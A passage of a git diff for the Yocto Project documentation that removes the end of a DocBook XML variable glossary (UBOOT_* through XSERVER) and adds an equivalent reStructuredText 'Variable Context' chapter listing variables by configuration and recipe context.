-                    <filename>UBOOT_ENTRYPOINT</filename> variable is passed
-                    as a command-line parameter to the
-                    <filename>uboot-mkimage</filename> utility.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-UBOOT_LOADADDRESS'><glossterm>UBOOT_LOADADDRESS</glossterm>
-            <info>
-               UBOOT_LOADADDRESS[doc] = "Specifies the load address for the U-Boot image."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the load address for the U-Boot image.
-                    During U-Boot image creation, the
-                    <filename>UBOOT_LOADADDRESS</filename> variable is passed
-                    as a command-line parameter to the
-                    <filename>uboot-mkimage</filename> utility.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-UBOOT_LOCALVERSION'><glossterm>UBOOT_LOCALVERSION</glossterm>
-            <info>
-               UBOOT_LOCALVERSION[doc] = "Appends a string to the name of the local version of the U-Boot image."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Appends a string to the name of the local version of the
-                    U-Boot image.
-                    For example, assuming the version of the U-Boot image
-                    built was "2013.10", the full version string reported by
-                    U-Boot would be "2013.10-yocto" given the following
-                    statement:
-                    <literallayout class='monospaced'>
-     UBOOT_LOCALVERSION = "-yocto"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-UBOOT_MACHINE'><glossterm>UBOOT_MACHINE</glossterm>
-            <info>
-               UBOOT_MACHINE[doc] = "Specifies the value passed on the make command line when building a U-Boot image."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the value passed on the
-                    <filename>make</filename> command line when building
-                    a U-Boot image.
-                    The value indicates the target platform configuration.
-                    You typically set this variable from the machine
-                    configuration file (i.e.
-                    <filename>conf/machine/<replaceable>machine_name</replaceable>.conf</filename>).
-                </para>
-
-                <para>
-                    Please see the "Selection of Processor Architecture and
-                    Board Type" section in the U-Boot README for valid values
-                    for this variable.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-UBOOT_MAKE_TARGET'><glossterm>UBOOT_MAKE_TARGET</glossterm>
-            <info>
-               UBOOT_MAKE_TARGET[doc] = "Specifies the target called in the Makefile."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the target called in the
-                    <filename>Makefile</filename>.
-                    The default target is "all".
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-UBOOT_SUFFIX'><glossterm>UBOOT_SUFFIX</glossterm>
-            <info>
-               UBOOT_SUFFIX[doc] = "Points to the generated U-Boot extension."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Points to the generated U-Boot extension.
-                    For example, <filename>u-boot.sb</filename> has a
-                    <filename>.sb</filename> extension.
-                </para>
-
-                <para>
-                    The default U-Boot extension is
-                    <filename>.bin</filename>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-UBOOT_TARGET'><glossterm>UBOOT_TARGET</glossterm>
-            <info>
-               UBOOT_TARGET[doc] = "Specifies the target used for building U-Boot."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the target used for building U-Boot.
-                    The target is passed directly as part of the "make" command
-                    (e.g. SPL and AIS).
-                    If you do not specifically set this variable, the
-                    OpenEmbedded build process passes and uses "all" for the
-                    target during the U-Boot building process.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-UNKNOWN_CONFIGURE_WHITELIST'><glossterm>UNKNOWN_CONFIGURE_WHITELIST</glossterm>
-            <info>
-               UNKNOWN_CONFIGURE_WHITELIST[doc] = "Specifies a list of options that, if reported by the configure script as being invalid, should not generate a warning during the do_configure task."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies a list of options that, if reported by the
-                    configure script as being invalid, should not generate a
-                    warning during the
-                    <link linkend='ref-tasks-configure'><filename>do_configure</filename></link>
-                    task.
-                    Normally, invalid configure options are simply not passed
-                    to the configure script (e.g. should be removed from
-                    <link linkend='var-EXTRA_OECONF'><filename>EXTRA_OECONF</filename></link>
-                    or
-                    <link linkend='var-PACKAGECONFIG_CONFARGS'><filename>PACKAGECONFIG_CONFARGS</filename></link>).
-                    However, common options, for example, exist that are passed
-                    to all configure scripts at a class level that might not
-                    be valid for some configure scripts.
-                    It follows that no benefit exists in seeing a warning about
-                    these options.
-                    For these cases, the options are added to
-                    <filename>UNKNOWN_CONFIGURE_WHITELIST</filename>.
-                </para>
-
-                <para>
-                    The configure arguments check that uses
-                    <filename>UNKNOWN_CONFIGURE_WHITELIST</filename> is part
-                    of the
-                    <link linkend='ref-classes-insane'><filename>insane</filename></link>
-                    class and is only enabled if the recipe inherits the
-                    <link linkend='ref-classes-autotools'><filename>autotools</filename></link>
-                    class.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-UPDATERCPN'><glossterm>UPDATERCPN</glossterm>
-            <info>
-               UPDATERCPN[doc] = "Specifies the package that contains the initscript that is enabled."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    For recipes inheriting the
-                    <link linkend='ref-classes-update-rc.d'><filename>update-rc.d</filename></link>
-                    class, <filename>UPDATERCPN</filename> specifies
-                    the package that contains the initscript that is
-                    enabled.
-                </para>
-
-                <para>
-                    The default value is "${PN}".
-                    Given that almost all recipes that install initscripts
-                    package them in the main package for the recipe, you
-                    rarely need to set this variable in individual recipes.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-UPSTREAM_CHECK_GITTAGREGEX'><glossterm>UPSTREAM_CHECK_GITTAGREGEX</glossterm>
-            <info>
-               UPSTREAM_CHECK_GITTAGREGEX[doc] = "Filters relevant Git tags when fetching source from an upstream Git repository."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    You can perform a per-recipe check for what the latest
-                    upstream source code version is by calling
-                    <filename>bitbake -c checkpkg</filename> <replaceable>recipe</replaceable>.
-                    If the recipe source code is provided from Git
-                    repositories, the OpenEmbedded build system determines the
-                    latest upstream version by picking the latest tag from the
-                    list of all repository tags.
-                </para>
-
-                <para>
-                    You can use the
-                    <filename>UPSTREAM_CHECK_GITTAGREGEX</filename>
-                    variable to provide a regular expression to filter only the
-                    relevant tags should the default filter not work
-                    correctly.
-                    <literallayout class='monospaced'>
-     UPSTREAM_CHECK_GITTAGREGEX = "git_tag_regex"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-UPSTREAM_CHECK_REGEX'><glossterm>UPSTREAM_CHECK_REGEX</glossterm>
-            <info>
-               UPSTREAM_CHECK_REGEX[doc] = "The regular expression the package checking system uses to parse the page pointed to by UPSTREAM_CHECK_URI."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Use the <filename>UPSTREAM_CHECK_REGEX</filename> variable
-                    to specify a different regular expression instead of the
-                    default one when the package checking system is parsing
-                    the page found using
-                    <link linkend='var-UPSTREAM_CHECK_URI'><filename>UPSTREAM_CHECK_URI</filename></link>.
-                    <literallayout class='monospaced'>
-     UPSTREAM_CHECK_REGEX = "package_regex"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-UPSTREAM_CHECK_URI'><glossterm>UPSTREAM_CHECK_URI</glossterm>
-            <info>
-               UPSTREAM_CHECK_URI[doc] = "The URL used by the package checking system to get the latest version of the package when source files are fetched from an upstream Git repository."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    You can perform a per-recipe check for what the latest
-                    upstream source code version is by calling
-                    <filename>bitbake -c checkpkg</filename> <replaceable>recipe</replaceable>.
-                    If the source code is provided from tarballs, the latest
-                    version is determined by fetching the directory listing
-                    where the tarball is and attempting to find a later tarball.
-                    When this approach does not work, you can use
-                    <filename>UPSTREAM_CHECK_URI</filename> to
-                    provide a different URI that contains the link to the
-                    latest tarball.
-                    <literallayout class='monospaced'>
-     UPSTREAM_CHECK_URI = "recipe_url"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-USE_DEVFS'><glossterm>USE_DEVFS</glossterm>
-            <info>
-               USE_DEVFS[doc] = "Determines if devtmpfs is used for /dev population."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Determines if <filename>devtmpfs</filename> is used for
-                    <filename>/dev</filename> population.
-                    The default value used for <filename>USE_DEVFS</filename>
-                    is "1" when no value is specifically set.
-                    Typically, you would set <filename>USE_DEVFS</filename>
-                    to "0" for a statically populated <filename>/dev</filename>
-                    directory.
-                </para>
-
-                <para>
-                    See the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#selecting-dev-manager'>Selecting a Device Manager</ulink>"
-                    section in the Yocto Project Development Tasks Manual for
-                    information on how to use this variable.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-USE_VT'><glossterm>USE_VT</glossterm>
-            <info>
-               USE_VT[doc] = "When using SysVinit, determines whether or not to run a getty on any virtual terminals in order to enable logging in through those terminals."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When using
-                    <ulink url='&YOCTO_DOCS_DEV_URL;#new-recipe-enabling-system-services'>SysVinit</ulink>,
-                    determines whether or not to run a
-                    <ulink url='http://en.wikipedia.org/wiki/Getty_%28Unix%29'>getty</ulink>
-                    on any virtual terminals in order to enable logging in
-                    through those terminals.
-                </para>
-
-                <para>
-                    The default value used for <filename>USE_VT</filename>
-                    is "1" when no default value is specifically set.
-                    Typically, you would set <filename>USE_VT</filename>
-                    to "0" in the machine configuration file for machines
-                    that do not have a graphical display attached and
-                    therefore do not need virtual terminal functionality.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-USER_CLASSES'><glossterm>USER_CLASSES</glossterm>
-            <info>
-               USER_CLASSES[doc] = "List of additional classes to use when building images that enable extra features."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A list of classes to globally inherit.
-                    These classes are used by the OpenEmbedded build system
-                    to enable extra features (e.g.
-                    <filename>buildstats</filename>,
-                    <filename>image-mklibs</filename>, and so forth).
-                </para>
-
-                <para>
-                    The default list is set in your
-                    <filename>local.conf</filename> file:
-                    <literallayout class='monospaced'>
-     USER_CLASSES ?= "buildstats image-mklibs image-prelink"
-                    </literallayout>
-                    For more information, see
-                    <filename>meta-poky/conf/local.conf.sample</filename> in
-                    the
-                    <link linkend='source-directory'>Source Directory</link>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-USERADD_ERROR_DYNAMIC'><glossterm>USERADD_ERROR_DYNAMIC</glossterm>
-            <info>
-               USERADD_ERROR_DYNAMIC[doc] = "If set to 'error', forces the OpenEmbedded build system to produce an error if the user identification (uid) and group identification (gid) values are not defined in any of the files listed in USERADD_UID_TABLES and USERADD_GID_TABLES. If set to 'warn', a warning will be issued instead."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-
-                    If set to <filename>error</filename>, forces the
-                    OpenEmbedded build system to produce an error if the user
-                    identification (<filename>uid</filename>) and group
-                    identification (<filename>gid</filename>) values are not
-                    defined in any of the files listed
-                    in <link linkend='var-USERADD_UID_TABLES'><filename>USERADD_UID_TABLES</filename></link>
-                    and <link linkend='var-USERADD_GID_TABLES'><filename>USERADD_GID_TABLES</filename></link>. If
-                    set to <filename>warn</filename>, a warning will be issued
-                    instead.
-                </para>
-
-                <para>
-                    The default behavior for the build system is to dynamically
-                    apply <filename>uid</filename> and
-                    <filename>gid</filename> values.
-                    Consequently, the <filename>USERADD_ERROR_DYNAMIC</filename>
-                    variable is by default not set.
-                    If you plan on using statically assigned
-                    <filename>gid</filename> and <filename>uid</filename>
-                    values, you should set
-                    the <filename>USERADD_ERROR_DYNAMIC</filename> variable in
-                    your <filename>local.conf</filename> file as
-                    follows:
-                    <literallayout class='monospaced'>
-     USERADD_ERROR_DYNAMIC = "error"
-                    </literallayout>
-                    Overriding the default behavior implies you are going to
-                    also take steps to set static <filename>uid</filename> and
-                    <filename>gid</filename> values through use of the
-                    <link linkend='var-USERADDEXTENSION'><filename>USERADDEXTENSION</filename></link>,
-                    <link linkend='var-USERADD_UID_TABLES'><filename>USERADD_UID_TABLES</filename></link>,
-                    and
-                    <link linkend='var-USERADD_GID_TABLES'><filename>USERADD_GID_TABLES</filename></link>
-                    variables.
-                </para>
-
-                <note>
-                    There is a difference in behavior between
-                    setting <filename>USERADD_ERROR_DYNAMIC</filename>
-                    to <filename>error</filename> and setting it
-                    to <filename>warn</filename>. When it is set
-                    to <filename>warn</filename>, the build system will report a
-                    warning for every undefined <filename>uid</filename> and
-                    <filename>gid</filename> in any recipe. But when it is set
-                    to <filename>error</filename>, it will only report errors
-                    for recipes that are actually built. This saves you from
-                    having to add static IDs for recipes that you know will
-                    never be built.
-                </note>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-USERADD_GID_TABLES'><glossterm>USERADD_GID_TABLES</glossterm>
-            <info>
-               USERADD_GID_TABLES[doc] = "Specifies a password file to use for obtaining static group identification (gid) values when the OpenEmbedded build system adds a group to the system during package installation."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies a password file to use for obtaining static
-                    group identification (<filename>gid</filename>) values
-                    when the OpenEmbedded build system adds a group to the
-                    system during package installation.
-                </para>
-
-                <para>
-                    When applying static group identification
-                    (<filename>gid</filename>) values, the OpenEmbedded build
-                    system looks in
-                    <link linkend='var-BBPATH'><filename>BBPATH</filename></link>
-                    for a <filename>files/group</filename> file and then applies
-                    those <filename>uid</filename> values.
-                    Set the variable as follows in your
-                    <filename>local.conf</filename> file:
-                    <literallayout class='monospaced'>
-     USERADD_GID_TABLES = "files/group"
-                    </literallayout>
-                </para>
-
-                <note>
-                    Setting the
-                    <link linkend='var-USERADDEXTENSION'><filename>USERADDEXTENSION</filename></link>
-                    variable to "useradd-staticids" causes the build system
-                    to use static <filename>gid</filename> values.
-                </note>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-USERADD_PACKAGES'><glossterm>USERADD_PACKAGES</glossterm>
-            <info>
-               USERADD_PACKAGES[doc] = "When a recipe inherits the useradd class, this variable specifies the individual packages within the recipe that require users and/or groups to be added."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When inheriting the
-                    <link linkend='ref-classes-useradd'><filename>useradd</filename></link>
-                    class, this variable
-                    specifies the individual packages within the recipe that
-                    require users and/or groups to be added.
-                </para>
-
-                <para>
-                    You must set this variable if the recipe inherits the
-                    class.
-                    For example, the following enables adding a user for the
-                    main package in a recipe:
-                    <literallayout class='monospaced'>
-     USERADD_PACKAGES = "${PN}"
-                    </literallayout>
-                    <note>
-                        It follows that if you are going to use the
-                        <filename>USERADD_PACKAGES</filename> variable,
-                        you need to set one or more of the
-                        <link linkend='var-USERADD_PARAM'><filename>USERADD_PARAM</filename></link>,
-                        <link linkend='var-GROUPADD_PARAM'><filename>GROUPADD_PARAM</filename></link>,
-                        or
-                        <link linkend='var-GROUPMEMS_PARAM'><filename>GROUPMEMS_PARAM</filename></link>
-                        variables.
-                    </note>
-                </para>
-
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-USERADD_PARAM'><glossterm>USERADD_PARAM</glossterm>
-            <info>
-               USERADD_PARAM[doc] = "When a recipe inherits the useradd class, this variable specifies for a package what parameters should pass to the useradd command if you add a user to the system when the package is installed."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When inheriting the
-                    <link linkend='ref-classes-useradd'><filename>useradd</filename></link>
-                    class, this variable
-                    specifies for a package what parameters should pass
-                    to the <filename>useradd</filename> command
-                    if you add a user to the system when the package
-                    is installed.
-                </para>
-
-                <para>
-                    Here is an example from the <filename>dbus</filename>
-                    recipe:
-                    <literallayout class='monospaced'>
-     USERADD_PARAM_${PN} = "--system --home ${localstatedir}/lib/dbus \
-                            --no-create-home --shell /bin/false \
-                            --user-group messagebus"
-                    </literallayout>
-                    For information on the standard Linux shell command
-                    <filename>useradd</filename>, see
-                    <ulink url='http://linux.die.net/man/8/useradd'></ulink>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-USERADD_UID_TABLES'><glossterm>USERADD_UID_TABLES</glossterm>
-            <info>
-               USERADD_UID_TABLES[doc] = "Specifies a password file to use for obtaining static user identification (uid) values when the OpenEmbedded build system adds a user to the system during package installation."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies a password file to use for obtaining static
-                    user identification (<filename>uid</filename>) values
-                    when the OpenEmbedded build system adds a user to the
-                    system during package installation.
-                </para>
-
-                <para>
-                    When applying static user identification
-                    (<filename>uid</filename>) values, the OpenEmbedded build
-                    system looks in
-                    <link linkend='var-BBPATH'><filename>BBPATH</filename></link>
-                    for a <filename>files/passwd</filename> file and then applies
-                    those <filename>uid</filename> values.
-                    Set the variable as follows in your
-                    <filename>local.conf</filename> file:
-                    <literallayout class='monospaced'>
-     USERADD_UID_TABLES = "files/passwd"
-                    </literallayout>
-                </para>
-
-                <note>
-                    Setting the
-                    <link linkend='var-USERADDEXTENSION'><filename>USERADDEXTENSION</filename></link>
-                    variable to "useradd-staticids" causes the build system
-                    to use static <filename>uid</filename> values.
-                </note>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-USERADDEXTENSION'><glossterm>USERADDEXTENSION</glossterm>
-            <info>
-               USERADDEXTENSION[doc] = "When set to 'useradd-staticids', causes the OpenEmbedded build system to base all user and group additions on a static passwd and group files found in BBPATH."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When set to "useradd-staticids", causes the
-                    OpenEmbedded build system to base all user and group
-                    additions on a static
-                    <filename>passwd</filename> and
-                    <filename>group</filename> files found in
-                    <link linkend='var-BBPATH'><filename>BBPATH</filename></link>.
-                </para>
-
-                <para>
-                    To use static user identification (<filename>uid</filename>)
-                    and group identification (<filename>gid</filename>)
-                    values, set the variable
-                    as follows in your <filename>local.conf</filename> file:
-                    <literallayout class='monospaced'>
-     USERADDEXTENSION = "useradd-staticids"
-                    </literallayout>
-                    <note>
-                        Setting this variable to use static
-                        <filename>uid</filename> and <filename>gid</filename>
-                        values causes the OpenEmbedded build system to employ
-                        the
-                        <link linkend='ref-classes-useradd'><filename>useradd-staticids</filename></link>
-                        class.
-                    </note>
-                </para>
-
-                <para>
-                    If you use static <filename>uid</filename> and
-                    <filename>gid</filename> information, you must also
-                    specify the <filename>files/passwd</filename> and
-                    <filename>files/group</filename> files by setting the
-                    <link linkend='var-USERADD_UID_TABLES'><filename>USERADD_UID_TABLES</filename></link>
-                    and
-                    <link linkend='var-USERADD_GID_TABLES'><filename>USERADD_GID_TABLES</filename></link>
-                    variables.
-                    Additionally, you should also set the
-                    <link linkend='var-USERADD_ERROR_DYNAMIC'><filename>USERADD_ERROR_DYNAMIC</filename></link>
-                    variable.
-                </para>
-            </glossdef>
-        </glossentry>
-
-    </glossdiv>
-
-    <glossdiv id='var-glossary-v'><title>V</title>
-
-        <glossentry id='var-VOLATILE_LOG_DIR'><glossterm>VOLATILE_LOG_DIR</glossterm>
-            <info>
-               VOLATILE_LOG_DIR[doc] = "Specifies the persistence of the target's /var/log directory, which is used to house postinstall target log files."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the persistence of the target's
-                    <filename>/var/log</filename> directory, which is used to
-                    house postinstall target log files.
-                </para>
-
-                <para>
-                    By default, <filename>VOLATILE_LOG_DIR</filename> is set
-                    to "yes", which means the file is not persistent.
-                    You can override this setting by setting the
-                    variable to "no" to make the log directory persistent.
-                </para>
-            </glossdef>
-        </glossentry>
-
-    </glossdiv>
-
-    <glossdiv id='var-glossary-w'><title>W</title>
-
-        <glossentry id='var-WARN_QA'><glossterm>WARN_QA</glossterm>
-            <info>
-               WARN_QA[doc] = "Specifies the quality assurance checks whose failures are reported as warnings by the OpenEmbedded build system."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the quality assurance checks whose failures are
-                    reported as warnings by the OpenEmbedded build system.
-                    You set this variable in your distribution configuration
-                    file.
-                    For a list of the checks you can control with this variable,
-                    see the
-                    "<link linkend='ref-classes-insane'><filename>insane.bbclass</filename></link>"
-                    section.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-WKS_FILE_DEPENDS'><glossterm>WKS_FILE_DEPENDS</glossterm>
-            <info>
-               WKS_FILE_DEPENDS[doc] = "Lists a recipe's build-time dependencies specific to Wic."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When placed in the recipe that builds your image, this
-                    variable lists build-time dependencies.
-                    The <filename>WKS_FILE_DEPENDS</filename> variable is only
-                    applicable when Wic images are active (i.e. when
-                    <link linkend='var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></link>
-                    contains entries related to Wic).
-                    If your recipe does not create Wic images, the variable
-                    has no effect.
-                </para>
-
-                <para>
-                    The <filename>WKS_FILE_DEPENDS</filename> variable is
-                    similar to the
-                    <link linkend='var-DEPENDS'><filename>DEPENDS</filename></link>
-                    variable.
-                    When you use the variable in your recipe that builds the
-                    Wic image, dependencies you list in the
-                    <filename>WIC_FILE_DEPENDS</filename> variable are added to
-                    the <filename>DEPENDS</filename> variable.
-                </para>
-
-                <para>
-                    With the <filename>WKS_FILE_DEPENDS</filename> variable,
-                    you have the possibility to specify a list of additional
-                    dependencies (e.g. native tools, bootloaders, and so forth),
-                    that are required to build Wic images.
-                    Following is an example:
-                    <literallayout class='monospaced'>
-     WKS_FILE_DEPENDS = "<replaceable>some-native-tool</replaceable>"
-                    </literallayout>
-                    In the previous example,
-                    <replaceable>some-native-tool</replaceable> would be
-                    replaced with an actual native tool on which the build
-                    would depend.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-WKS_FILE'><glossterm>WKS_FILE</glossterm>
-            <info>
-               WKS_FILE[doc] = "Specifies the name of the wic kickstart file."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the location of the Wic
-                    kickstart file that is used by the OpenEmbedded build
-                    system to create a partitioned image
-                    (<replaceable>image</replaceable><filename>.wic</filename>).
-                    For information on how to create a partitioned image, see
-                    the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#creating-partitioned-images-using-wic'>Creating Partitioned Images Using Wic</ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                    For details on the kickstart file format, see the
-                    "<link linkend='ref-kickstart'>OpenEmbedded Kickstart (<filename>.wks</filename>) Reference</link>"
-                    Chapter.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-WORKDIR'><glossterm>WORKDIR</glossterm>
-            <info>
-               WORKDIR[doc] = "The pathname of the working directory in which the OpenEmbedded build system builds a recipe. This directory is located within the TMPDIR directory structure and changes as different packages are built."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The pathname of the work directory in which the OpenEmbedded
-                    build system builds a recipe.
-                    This directory is located within the
-                    <link linkend='var-TMPDIR'><filename>TMPDIR</filename></link>
-                    directory structure and is specific to the recipe being
-                    built and the system for which it is being built.
-                </para>
-
-                <para>
-                    The <filename>WORKDIR</filename> directory is defined as
-                    follows:
-                    <literallayout class='monospaced'>
-     ${TMPDIR}/work/${MULTIMACH_TARGET_SYS}/${PN}/${EXTENDPE}${PV}-${PR}
-                    </literallayout>
-                    The actual directory depends on several things:
-                    <itemizedlist>
-                        <listitem><filename>TMPDIR</filename>:
-                            The top-level build output directory</listitem>
-                        <listitem><link linkend='var-MULTIMACH_TARGET_SYS'><filename>MULTIMACH_TARGET_SYS</filename></link>:
-                            The target system identifier</listitem>
-                        <listitem><link linkend='var-PN'><filename>PN</filename></link>:
-                            The recipe name</listitem>
-                        <listitem><link linkend='var-EXTENDPE'><filename>EXTENDPE</filename></link>:
-                            The epoch - (if
-                            <link linkend='var-PE'><filename>PE</filename></link>
-                            is not specified, which is usually the case for most
-                            recipes, then <filename>EXTENDPE</filename> is blank)</listitem>
-                        <listitem><link linkend='var-PV'><filename>PV</filename></link>:
-                            The recipe version</listitem>
-                        <listitem><link linkend='var-PR'><filename>PR</filename></link>:
-                            The recipe revision</listitem>
-                    </itemizedlist>
-                </para>
-
-                <para>
-                    As an example, assume a Source Directory top-level folder
-                    name <filename>poky</filename>, a default Build Directory at
-                    <filename>poky/build</filename>, and a
-                    <filename>qemux86-poky-linux</filename> machine target
-                    system.
-                    Furthermore, suppose your recipe is named
-                    <filename>foo_1.3.0-r0.bb</filename>.
-                    In this case, the work directory the build system uses to
-                    build the package would be as follows:
-                    <literallayout class='monospaced'>
-     poky/build/tmp/work/qemux86-poky-linux/foo/1.3.0-r0
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-    </glossdiv>
-
-    <glossdiv id='var-glossary-x'><title>X</title>
-
-        <glossentry id='var-XSERVER'><glossterm>XSERVER</glossterm>
-            <info>
-               XSERVER[doc] = "Specifies the packages that should be installed to provide an X server and drivers for the current machine."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the packages that should be installed to
-                    provide an X server and drivers for the current machine,
-                    assuming your image directly includes
-                    <filename>packagegroup-core-x11-xserver</filename> or,
-                    perhaps indirectly, includes "x11-base" in
-                    <link linkend='var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></link>.
-                </para>
-
-                <para>
-                    The default value of <filename>XSERVER</filename>, if not
-                    specified in the machine configuration, is
-                    "xserver-xorg xf86-video-fbdev xf86-input-evdev".
-                </para>
-            </glossdef>
-        </glossentry>
-
-    </glossdiv>
-
-<!--            <glossdiv id='var-glossary-y'><title>Y</title>-->
-<!--            </glossdiv>-->
-
-<!--            <glossdiv id='var-glossary-z'><title>Z</title>-->
-<!--            </glossdiv>-->
-
-</glossary>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/ref-manual/ref-varlocality.rst b/documentation/ref-manual/ref-varlocality.rst
new file mode 100644
index 0000000000..5f7dba8775
--- /dev/null
+++ b/documentation/ref-manual/ref-varlocality.rst
@@ -0,0 +1,166 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+****************
+Variable Context
+****************
+
+While you can use most variables in almost any context such as
+``.conf``, ``.bbclass``, ``.inc``, and ``.bb`` files, some variables are
+often associated with a particular locality or context. This chapter
+describes some common associations.
+
+.. _ref-varlocality-configuration:
+
+Configuration
+=============
+
+The following subsections provide lists of variables whose context is
+configuration: distribution, machine, and local.
+
+.. _ref-varlocality-config-distro:
+
+Distribution (Distro)
+---------------------
+
+This section lists variables whose configuration context is the
+distribution, or distro.
+
+-  :term:`DISTRO`
+
+-  :term:`DISTRO_NAME`
+
+-  :term:`DISTRO_VERSION`
+
+-  :term:`MAINTAINER`
+
+-  :term:`PACKAGE_CLASSES`
+
+-  :term:`TARGET_OS`
+
+-  :term:`TARGET_FPU`
+
+-  :term:`TCMODE`
+
+-  :term:`TCLIBC`
+
+.. _ref-varlocality-config-machine:
+
+Machine
+-------
+
+This section lists variables whose configuration context is the machine.
+
+-  :term:`TARGET_ARCH`
+
+-  :term:`SERIAL_CONSOLES`
+
+-  :term:`PACKAGE_EXTRA_ARCHS`
+
+-  :term:`IMAGE_FSTYPES`
+
+-  :term:`MACHINE_FEATURES`
+
+-  :term:`MACHINE_EXTRA_RDEPENDS`
+
+-  :term:`MACHINE_EXTRA_RRECOMMENDS`
+
+-  :term:`MACHINE_ESSENTIAL_EXTRA_RDEPENDS`
+
+-  :term:`MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS`
+
+.. _ref-varlocality-config-local:
+
+Local
+-----
+
+This section lists variables whose configuration context is the local
+configuration through the ``local.conf`` file.
+
+-  :term:`DISTRO`
+
+-  :term:`MACHINE`
+
+-  :term:`DL_DIR`
+
+-  :term:`BBFILES`
+
+-  :term:`EXTRA_IMAGE_FEATURES`
+
+-  :term:`PACKAGE_CLASSES`
+
+-  :term:`BB_NUMBER_THREADS`
+
+-  :term:`BBINCLUDELOGS`
+
+-  :term:`ENABLE_BINARY_LOCALE_GENERATION`
+
+.. _ref-varlocality-recipes:
+
+Recipes
+=======
+
+The following subsections provide lists of variables whose context is
+recipes: required, dependencies, path, and extra build information.
+
+.. _ref-varlocality-recipe-required:
+
+Required
+--------
+
+This section lists variables that are required for recipes.
+
+-  :term:`LICENSE`
+
+-  :term:`LIC_FILES_CHKSUM`
+
+-  :term:`SRC_URI` - used in recipes that fetch local or remote files.
+
+.. _ref-varlocality-recipe-dependencies:
+
+Dependencies
+------------
+
+This section lists variables that define recipe dependencies.
+
+-  :term:`DEPENDS`
+
+-  :term:`RDEPENDS`
+
+-  :term:`RRECOMMENDS`
+
+-  :term:`RCONFLICTS`
+
+-  :term:`RREPLACES`
+
+.. _ref-varlocality-recipe-paths:
+
+Paths
+-----
+
+This section lists variables that define recipe paths.
+
+-  :term:`WORKDIR`
+
+-  :term:`S`
+
+-  :term:`FILES`
+
+.. _ref-varlocality-recipe-build:
+
+Extra Build Information
+-----------------------
+
+This section lists variables that define extra build information for
+recipes.
+
+-  :term:`DEFAULT_PREFERENCE`
+
+-  :term:`EXTRA_OECMAKE`
+
+-  :term:`EXTRA_OECONF`
+
+-  :term:`EXTRA_OEMAKE`
+
+-  :term:`PACKAGECONFIG_CONFARGS`
+
+-  :term:`PACKAGES`
diff --git a/documentation/ref-manual/ref-varlocality.xml b/documentation/ref-manual/ref-varlocality.xml
deleted file mode 100644
index 54524d5b60..0000000000
--- a/documentation/ref-manual/ref-varlocality.xml
+++ /dev/null
@@ -1,198 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
